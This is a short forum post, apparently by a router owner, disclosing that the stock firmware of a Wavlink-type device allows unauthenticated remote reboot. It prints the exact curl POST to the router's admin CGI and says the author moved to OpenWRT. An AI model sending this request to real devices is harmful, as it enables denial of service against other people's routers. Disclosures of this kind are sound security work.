I just wanted to confirm with everyone something that I found with this device.
The stock firmware on this device is inherently insecure - I can remotely reboot this device without any authentication by using a simple curl call:
curl -vvv -d "page=reboot" -X POST http://192.168.1.1/cgi-bin/adm.cgi
I did confirm that this has the exact same chipset as this device https://openwrt.org/toh/wavlink/wl-wn575a3?s[]=wavlink
and that the recovery works exactly the same way, so I'm running a much more secure OpenWRT v18.06.5 now